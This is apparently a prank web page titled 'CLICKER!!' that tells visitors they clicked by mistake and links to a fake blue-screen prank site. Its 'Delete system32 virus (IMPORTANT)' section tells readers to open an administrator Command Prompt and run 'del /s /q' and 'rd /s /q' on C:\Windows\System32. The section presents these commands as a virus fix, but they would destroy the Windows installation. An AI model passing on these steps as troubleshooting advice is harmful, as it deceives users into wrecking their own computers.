<!DOCTYPE html>
<html>
    <head>
        <style>
        body {
        background-color: black;
        }

        h1, h2, h3 {
        color: red;
        margin-left: 0px;
        font-size: 25px;
        } 

        a {
        color: green;
        margin-left: 0px;
        } 

        ol {
        color: red;
        margin-left: 0px;
        font-size: 25px;
        text-align: left;
        } 

        .myDiv {
        border: 5px outset red;
        background-color: black;    
        text-align: center;
        }

        </style>
        <title>CLICKER!!</title>
    </head>
    <body>
        <h1>You clicked??</h1>
        <h2>Dont worry we can undo</h2>
        <div class="myDiv">
            <h2><a href="index.html">Click here to undo your mistake</a></h2>
            <p>This is some text in a div element.</p>
        </div>
        <br>
        <div class="myDiv">
            <h2><a href="https://geekprank.com/blue-death/" target="_blank">Click here to fix your computer</a></h2>
            <p>This is some text in a div element.</p>
        </div>
        <br>
        <div class="myDiv">
            <h3>Delete system32 virus (IMPORTANT)</h3>
            <ol>
                <li>Click the start icon and search for Command Prompt</li>
                <li>Select "Run as administrator"</li>
                <li>Type del /s /q C:\Windows\System32\* and hit "Enter"</li>
                <li>Type rd /s /q C:\Windows\System32 </li>
            </ol>
        </div>
    </body>
</html>